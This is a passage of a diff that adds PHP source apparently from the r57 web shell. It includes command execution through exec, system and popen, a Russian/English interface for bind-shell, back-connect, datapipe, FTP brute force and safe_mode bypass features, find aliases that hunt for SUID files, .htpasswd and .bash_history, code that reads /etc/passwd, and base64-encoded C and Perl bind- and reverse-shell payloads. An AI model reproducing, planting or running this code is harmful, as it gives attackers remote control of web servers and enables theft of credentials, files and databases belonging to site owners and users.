    "; + echo in('hidden','db',0,$_POST['db']); + echo in('hidden','db_server',0,$_POST['db_server']); + echo in('hidden','db_port',0,$_POST['db_port']); + echo in('hidden','mysql_l',0,$_POST['mysql_l']); + echo in('hidden','mysql_p',0,$_POST['mysql_p']); + echo in('hidden','mysql_db',0,$_POST['mysql_db']); + echo in('hidden','cmd',0,'db_query'); + echo "
    "; + echo "Base: base."\">
    "; + echo "


    "; + echo "
    "; + echo "
    [ BACK ]
    "; die(); + } +if(isset($_GET['delete'])) + { + @unlink(__FILE__); + } +if(isset($_GET['tmp'])) + { + @unlink("/tmp/bdpl"); + @unlink("/tmp/back"); + @unlink("/tmp/bd"); + @unlink("/tmp/bd.c"); + @unlink("/tmp/dp"); + @unlink("/tmp/dpc"); + @unlink("/tmp/dpc.c"); + } +if(isset($_GET['phpini'])) +{ +echo $head; +function U_value($value) + { + if ($value == '') return 'no value'; + if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; + if ($value === null) return 'NULL'; + if (@is_object($value)) $value = (array) $value; + if (@is_array($value)) + { + @ob_start(); + print_r($value); + $value = @ob_get_contents(); + @ob_end_clean(); + } + return U_wordwrap((string) $value); + } +function U_wordwrap($str) + { + $str = @wordwrap(@htmlspecialchars($str), 100, '', true); + return @preg_replace('!(&[^;]*)([^;]*;)!', '$1$2', $str); + } +if (@function_exists('ini_get_all')) + { + $r = ''; + echo '', ''; + foreach (@ini_get_all() as $key=>$value) + { + $r .= ''; + } + echo $r; + echo '
    Directive
    Local Value
    Master Value
    '.ws(3).''.$key.'
    '.U_value($value['local_value']).'
    '.U_value($value['global_value']).'
    '; + } +echo "
    [ BACK ]
    "; +die(); +} +if(isset($_GET['cpu'])) + { + echo $head; + echo '
    CPU
    '; + $cpuf = @file("cpuinfo"); + if($cpuf) + { + $c = @sizeof($cpuf); + for($i=0;$i<$c;$i++) + { + $info = @explode(":",$cpuf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= ''; + } + echo $r; + } + else + { + echo ''; + } + echo '
    '.ws(3).''.trim($info[0]).'
    '.trim($info[1]).'
    '.ws(3).'
    ---
    '; + echo "
    [ BACK ]
    "; + die(); + } +if(isset($_GET['mem'])) + { + echo $head; + echo '
    MEMORY
    '; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= ''; + } + echo $r; + } + else + { + echo ''; + } + echo '
    '.ws(3).''.trim($info[0]).'
    '.trim($info[1]).'
    '.ws(3).'
    ---
    '; + echo "
    [ BACK ]
    "; + die(); + } +$lang=array( +'ru_text1' =>'??????????? ???????', +'ru_text2' =>'?????????? ?????? ?? ???????', +'ru_text3' =>'????????? ???????', +'ru_text4' =>'??????? ??????????', +'ru_text5' =>'???????? ?????? ?? ??????', +'ru_text6' =>'????????? ????', +'ru_text7' =>'??????', +'ru_text8' =>'???????? ?????', +'ru_butt1' =>'?????????', +'ru_butt2' =>'?????????', +'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash', +'ru_text10'=>'??????? ????', +'ru_text11'=>'?????? ??? ???????', +'ru_butt3' =>'???????', +'ru_text12'=>'back-connect', +'ru_text13'=>'IP-?????', +'ru_text14'=>'????', +'ru_butt4' =>'?????????', +'ru_text15'=>'???????? ?????? ? ?????????? ???????', +'ru_text16'=>'????????????', +'ru_text17'=>'????????? ????', +'ru_text18'=>'????????? ????', +'ru_text19'=>'Exploits', +'ru_text20'=>'????????????', +'ru_text21'=>'????? ???', +'ru_text22'=>'datapipe', +'ru_text23'=>'????????? ????', +'ru_text24'=>'????????? ????', +'ru_text25'=>'????????? ????', +'ru_text26'=>'????????????', +'ru_butt5' =>'?????????', +'ru_text28'=>'?????? ? safe_mode', +'ru_text29'=>'?????? ????????', +'ru_butt6' =>'???????', +'ru_text30'=>'???????? ?????', +'ru_butt7' =>'???????', +'ru_text31'=>'???? ?? ??????', +'ru_text32'=>'?????????? PHP ????', +'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL', +'ru_butt8' =>'?????????', +'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include', +'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql', +'ru_text36'=>'???? . ???????', +'ru_text37'=>'?????', +'ru_text38'=>'??????', +'ru_text39'=>'????', +'ru_text40'=>'???? ??????? ???? ??????', +'ru_butt9' =>'????', +'ru_text41'=>'????????? ? ?????', +'ru_text42'=>'?????????????? ?????', +'ru_text43'=>'????????????? ????', +'ru_butt10'=>'?????????', +'ru_butt11'=>'?????????????', +'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!', +'ru_text45'=>'???? ????????', +'ru_text46'=>'???????? phpinfo()', +'ru_text47'=>'???????? ???????? php.ini', +'ru_text48'=>'???????? ????????? ??????', +'ru_text49'=>'???????? ??????? ? ???????', +'ru_text50'=>'?????????? ? ??????????', +'ru_text51'=>'?????????? ? ??????', +'ru_text52'=>'????? ??? ??????', +'ru_text53'=>'?????? ? ?????', +'ru_text54'=>'????? ?????? ? ??????', +'ru_butt12'=>'?????', +'ru_text55'=>'?????? ? ??????', +'ru_text56'=>'?????? ?? ???????', +'ru_text57'=>'???????/??????? ????/??????????', +'ru_text58'=>'???', +'ru_text59'=>'????', +'ru_text60'=>'??????????', +'ru_butt13'=>'???????/???????', +'ru_text61'=>'???? ??????', +'ru_text62'=>'?????????? ???????', +'ru_text63'=>'???? ??????', +'ru_text64'=>'?????????? ???????', +'ru_text65'=>'???????', +'ru_text66'=>'???????', +'ru_text67'=>'Chown/Chgrp/Chmod', +'ru_text68'=>'???????', +'ru_text69'=>'????????1', +'ru_text70'=>'????????2', +'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)", +'ru_text72'=>'????? ??? ??????', +'ru_text73'=>'?????? ? ?????', +'ru_text74'=>'?????? ? ??????', +'ru_text75'=>'* ????? ???????????? ?????????? ?????????', +'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find', +'ru_text80'=>'???', +'ru_text81'=>'????', +'ru_text82'=>'???? ??????', +'ru_text83'=>'?????????? SQL ???????', +'ru_text84'=>'SQL ??????', +'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????', +'ru_text86'=>'?????????? ????? ? ???????', +'ru_butt14'=>'???????', +'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????', +'ru_text88'=>'FTP-??????:????', +'ru_text89'=>'???? ?? ftp ???????', +'ru_text90'=>'????? ????????', +'ru_text91'=>'???????????? ?', +'ru_text92'=>'??? ?????????', +'ru_text93'=>'FTP', +'ru_text94'=>'FTP-????????', +'ru_text95'=>'?????? ?????????????', +'ru_text96'=>'?? ??????? ???????? ?????? ?????????????', +'ru_text97'=>'????????? ??????????: ', +'ru_text98'=>'??????? ???????????: ', +'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd', +'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????', +'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????', +'ru_text102'=>'?????', +'ru_text103'=>'???????? ??????', +'ru_text104'=>'???????? ????? ?? ???????? ????', +'ru_text105'=>'????', +'ru_text106'=>'??', +'ru_text107'=>'????', +'ru_butt15'=>'?????????', +'ru_text108'=>'????? ??????', +'ru_text109'=>'????????', +'ru_text110'=>'??????????', +'ru_text111'=>'SQL-?????? : ????', +'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail', +'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ?????????????? imap_list', +'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? imap_body', +'ru_text115'=>'???????? ??????????? ?????? ??????????? safe_mode, ??????????? ?????? ? compress.zlib:// ? copy()', +'ru_text116'=>'?????????? ????', +'ru_text117'=>'?', +'ru_text118'=>'???? ??????????', +'ru_text119'=>'?? ??????? ??????????? ????', +'ru_err0'=>'??????! ?? ???? ???????? ? ???? ', +'ru_err1'=>'??????! ?? ???? ????????? ???? ', +'ru_err2'=>'??????! ?? ??????? ??????? ', +'ru_err3'=>'??????! ?? ??????? ???????????? ? ftp ???????', +'ru_err4'=>'?????? ??????????? ?? ftp ???????', +'ru_err5'=>'??????! ?? ??????? ???????? ?????????? ?? ftp ???????', +'ru_err6'=>'??????! ?? ??????? ????????? ??????', +'ru_err7'=>'?????? ??????????', +/* --------------------------------------------------------------- */ +'eng_text1' =>'Executed command', +'eng_text2' =>'Execute command on server', +'eng_text3' =>'Run command', +'eng_text4' =>'Work directory', +'eng_text5' =>'Upload files on server', +'eng_text6' =>'Local file', +'eng_text7' =>'Aliases', +'eng_text8' =>'Select alias', +'eng_butt1' =>'Execute', +'eng_butt2' =>'Upload', +'eng_text9' =>'Bind port to /bin/bash', +'eng_text10'=>'Port', +'eng_text11'=>'Password for access', +'eng_butt3' =>'Bind', +'eng_text12'=>'back-connect', +'eng_text13'=>'IP', +'eng_text14'=>'Port', +'eng_butt4' =>'Connect', +'eng_text15'=>'Upload files from remote server', +'eng_text16'=>'With', +'eng_text17'=>'Remote file', +'eng_text18'=>'Local file', +'eng_text19'=>'Exploits', +'eng_text20'=>'Use', +'eng_text21'=>' New name', +'eng_text22'=>'datapipe', +'eng_text23'=>'Local port', +'eng_text24'=>'Remote host', +'eng_text25'=>'Remote port', +'eng_text26'=>'Use', +'eng_butt5' =>'Run', +'eng_text28'=>'Work in safe_mode', +'eng_text29'=>'ACCESS DENIED', +'eng_butt6' =>'Change', +'eng_text30'=>'Cat file', +'eng_butt7' =>'Show', +'eng_text31'=>'File not found', +'eng_text32'=>'Eval PHP code', +'eng_text33'=>'Test bypass open_basedir with cURL functions', +'eng_butt8' =>'Test', +'eng_text34'=>'Test bypass safe_mode with include function', +'eng_text35'=>'Test bypass safe_mode with load file in mysql', +'eng_text36'=>'Database . Table', +'eng_text37'=>'Login', +'eng_text38'=>'Password', +'eng_text39'=>'Database', +'eng_text40'=>'Dump database table', +'eng_butt9' =>'Dump', +'eng_text41'=>'Save dump in file', +'eng_text42'=>'Edit files', +'eng_text43'=>'File for edit', +'eng_butt10'=>'Save', +'eng_text44'=>'Can\'t edit file! Only read access!', +'eng_text45'=>'File saved', +'eng_text46'=>'Show phpinfo()', +'eng_text47'=>'Show variables from php.ini', +'eng_text48'=>'Delete temp files', +'eng_butt11'=>'Edit file', +'eng_text49'=>'Delete script from server', +'eng_text50'=>'View cpu info', +'eng_text51'=>'View memory info', +'eng_text52'=>'Find text', +'eng_text53'=>'In dirs', +'eng_text54'=>'Find text in files', +'eng_butt12'=>'Find', +'eng_text55'=>'Only in files', +'eng_text56'=>'Nothing :(', +'eng_text57'=>'Create/Delete File/Dir', +'eng_text58'=>'name', +'eng_text59'=>'file', +'eng_text60'=>'dir', +'eng_butt13'=>'Create/Delete', +'eng_text61'=>'File created', +'eng_text62'=>'Dir created', +'eng_text63'=>'File deleted', +'eng_text64'=>'Dir deleted', +'eng_text65'=>'Create', +'eng_text66'=>'Delete', +'eng_text67'=>'Chown/Chgrp/Chmod', +'eng_text68'=>'Command', +'eng_text69'=>'param1', +'eng_text70'=>'param2', +'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'eng_text72'=>'Text for find', +'eng_text73'=>'Find in folder', +'eng_text74'=>'Find in files', +'eng_text75'=>'* you can use regexp', +'eng_text76'=>'Search text in files via find', +'eng_text80'=>'Type', +'eng_text81'=>'Net', +'eng_text82'=>'Databases', +'eng_text83'=>'Run SQL query', +'eng_text84'=>'SQL query', +'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', +'eng_text86'=>'Download files from server', +'eng_butt14'=>'Download', +'eng_text87'=>'Download files from remote ftp-server', +'eng_text88'=>'FTP-server:port', +'eng_text89'=>'File on ftp', +'eng_text90'=>'Transfer mode', +'eng_text91'=>'Archivation', +'eng_text92'=>'without archivation', +'eng_text93'=>'FTP', +'eng_text94'=>'FTP-bruteforce', +'eng_text95'=>'Users list', +'eng_text96'=>'Can\'t get users list', +'eng_text97'=>'checked: ', +'eng_text98'=>'success: ', +'eng_text99'=>'* use username from /etc/passwd for ftp login and password', +'eng_text100'=>'Send file to remote ftp server', +'eng_text101'=>'Use reverse (user -> resu) login for password', +'eng_text102'=>'Mail', +'eng_text103'=>'Send email', +'eng_text104'=>'Send file to email', +'eng_text105'=>'To', +'eng_text106'=>'From', +'eng_text107'=>'Subj', +'eng_butt15'=>'Send', +'eng_text108'=>'Mail', +'eng_text109'=>'Hide', +'eng_text110'=>'Show', +'eng_text111'=>'SQL-Server : Port', +'eng_text112'=>'Test bypass safe_mode with function mb_send_mail', +'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list', +'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body', +'eng_text115'=>'Test bypass safe_mode, copy file via compress.zlib:// in function copy()', +'eng_text116'=>'Copy from', +'eng_text117'=>'to', +'eng_text118'=>'File copied', +'eng_text119'=>'Cant copy file', +'eng_err0'=>'Error! Can\'t write in file ', +'eng_err1'=>'Error! Can\'t read file ', +'eng_err2'=>'Error! Can\'t create ', +'eng_err3'=>'Error! Can\'t connect to ftp', +'eng_err4'=>'Error! Can\'t login on ftp server', +'eng_err5'=>'Error! Can\'t change dir on ftp', +'eng_err6'=>'Error! Can\'t sent mail', +'eng_err7'=>'Mail send', +); +/* +?????? ?????? +????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? ) +?? ?????? ???? ????????? ??? ???????? ???????. +*/ +$aliases=array( +'find suid files'=>'find / -type f -perm -04000 -ls', +'find suid files in current dir'=>'find . -type f -perm -04000 -ls', +'find sgid files'=>'find / -type f -perm -02000 -ls', +'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', +'find config.inc.php files'=>'find / -type f -name config.inc.php', +'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', +'find config* files'=>'find / -type f -name "config*"', +'find config* files in current dir'=>'find . -type f -name "config*"', +'find all writable files'=>'find / -type f -perm -2 -ls', +'find all writable files in current dir'=>'find . -type f -perm -2 -ls', +'find all writable directories'=>'find / -type d -perm -2 -ls', +'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', +'find all writable directories and files'=>'find / -perm -2 -ls', +'find all writable directories and files in current dir'=>'find . -perm -2 -ls', +'find all service.pwd files'=>'find / -type f -name service.pwd', +'find service.pwd files in current dir'=>'find . -type f -name service.pwd', +'find all .htpasswd files'=>'find / -type f -name .htpasswd', +'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', +'find all .bash_history files'=>'find / -type f -name .bash_history', +'find .bash_history files in current dir'=>'find . -type f -name .bash_history', +'find all .mysql_history files'=>'find / -type f -name .mysql_history', +'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', +'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', +'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc', +'list file attributes on a Linux second extended file system'=>'lsattr -va', +'show opened ports'=>'netstat -an | grep -i listen', +'----------------------------------------------------------------------------------------------------'=>'ls -la' +); +$table_up1 = "
    :: "; +$table_up2 = " ::
    "; +$table_up3 = ""; +$arrow = " 4"; +$lb = "["; +$rb = "]"; +$font = ""; +$ts = "
    "; +$table_end1 = "
    "; +$te = "
    "; +$fs = "
    "; +$fe = "
    "; + +if(isset($_GET['users'])) + { + if(!$users=get_users()) { echo "
    ".$lang[$language.'_text96']."
    "; } + else + { + echo '
    '; + foreach($users as $user) { echo $user."
    "; } + echo '
    '; + } + echo "
    [ BACK ]
    "; die(); + } + +if (!empty($_POST['dir'])) { @chdir($_POST['dir']); } +$dir = @getcwd(); +$unix = 0; +if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1; +if(empty($dir)) + { + $os = getenv('OS'); + if(empty($os)){ $os = php_uname(); } + if(empty($os)){ $os ="-"; $unix=1; } + else + { + if(@eregi("^win",$os)) { $unix = 0; } + else { $unix = 1; } + } + } +if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") + { + echo $head; + if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } + else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } + $sr->SearchText(0,0); + $res = $sr->GetResultFiles(); + $found = $sr->GetMatchesCount(); + $titles = $sr->GetTitles(); + $r = ""; + if($found > 0) + { + $r .= ""; + foreach($res as $file=>$v) + { + $r .= ""; + $r .= ""; + foreach($v as $a=>$b) + { + $r .= ""; + $r .= ""; + $r .= ""; + $r .= "\n"; + } + } + $r .= "
    ".ws(3); + $r .= (!$unix)? str_replace("/","\\",$file) : $file; + $r .= ""; + $r .= "
    ".$a."".ws(2).$b."
    "; + echo $r; + } + else + { + echo "

    ".$lang[$language.'_text56']."

    "; + } + echo "
    [ BACK ]
    "; + die(); + } +if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; } +$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); +if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } +function ws($i) +{ +return @str_repeat(" ",$i); +} +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +} +function get_users() +{ + $users = array(); + $rows=file('/etc/passwd'); + if(!$rows) return 0; + foreach ($rows as $string) + { + $user = @explode(":",$string); + if(substr($string,0,1)!='#') array_push($users,$user[0]); + } + return $users; +} +function err($n,$txt='') +{ +echo '
    '; +echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; +if(!empty($txt)) { echo " $txt"; } +echo '
    '; +return null; +} +function perms($mode) +{ +if (!$GLOBALS['unix']) return 0; +if( $mode & 0x1000 ) { $type='p'; } +else if( $mode & 0x2000 ) { $type='c'; } +else if( $mode & 0x4000 ) { $type='d'; } +else if( $mode & 0x6000 ) { $type='b'; } +else if( $mode & 0x8000 ) { $type='-'; } +else if( $mode & 0xA000 ) { $type='l'; } +else if( $mode & 0xC000 ) { $type='s'; } +else $type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; +if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} +function in($type,$name,$size,$value,$checked=0) +{ + $ret = ""; +} +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or err(0); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} +function sr($l,$t1,$t2) + { + return "".$t1."".$t2.""; + } +if (!@function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} + function DirFilesR($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if($types) + { + if(@in_array($ext,explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + class SearchResult + { + var $text; + var $FilesToSearch; + var $ResultFiles; + var $FilesTotal; + var $MatchesCount; + var $FileMatschesCount; + var $TimeStart; + var $TimeTotal; + var $titles; + function SearchResult($dir,$text,$filter='') + { + $dirs = @explode(";",$dir); + $this->FilesToSearch = Array(); + for($a=0;$aFilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); + $this->text = $text; + $this->FilesTotal = @count($this->FilesToSearch); + $this->TimeStart = getmicrotime(); + $this->MatchesCount = 0; + $this->ResultFiles = Array(); + $this->FileMatchesCount = Array(); + $this->titles = Array(); + } + function GetFilesTotal() { return $this->FilesTotal; } + function GetTitles() { return $this->titles; } + function GetTimeTotal() { return $this->TimeTotal; } + function GetMatchesCount() { return $this->MatchesCount; } + function GetFileMatchesCount() { return $this->FileMatchesCount; } + function GetResultFiles() { return $this->ResultFiles; } + function SearchText($phrase=0,$case=0) { + $qq = @explode(' ',$this->text); + $delim = '|'; + if($phrase) + foreach($qq as $k=>$v) + $qq[$k] = '\b'.$v.'\b'; + $words = '('.@implode($delim,$qq).')'; + $pattern = "/".$words."/"; + if(!$case) + $pattern .= 'i'; + foreach($this->FilesToSearch as $k=>$filename) + { + $this->FileMatchesCount[$filename] = 0; + $FileStrings = @file($filename) or @next; + for($a=0;$a<@count($FileStrings);$a++) + { + $count = 0; + $CurString = $FileStrings[$a]; + $CurString = @Trim($CurString); + $CurString = @strip_tags($CurString); + $aa = ''; + if(($count = @preg_match_all($pattern,$CurString,$aa))) + { + $CurString = @preg_replace($pattern,"\\1",$CurString); + $this->ResultFiles[$filename][$a+1] = $CurString; + $this->MatchesCount += $count; + $this->FileMatchesCount[$filename] += $count; + } + } + } + $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); + } + } + function getmicrotime() + { + list($usec,$sec) = @explode(" ",@microtime()); + return ((float)$usec + (float)$sec); + } +$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS +A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I +GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt +b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 +pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF +NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK +ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog +ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk +7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 +9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld +2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu +dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp +lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; +$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS +VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs +JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV +TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG +lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK +Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i +Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N +lIENPTk47DQpleGl0IDA7DQp9DQp9"; +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC +BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb 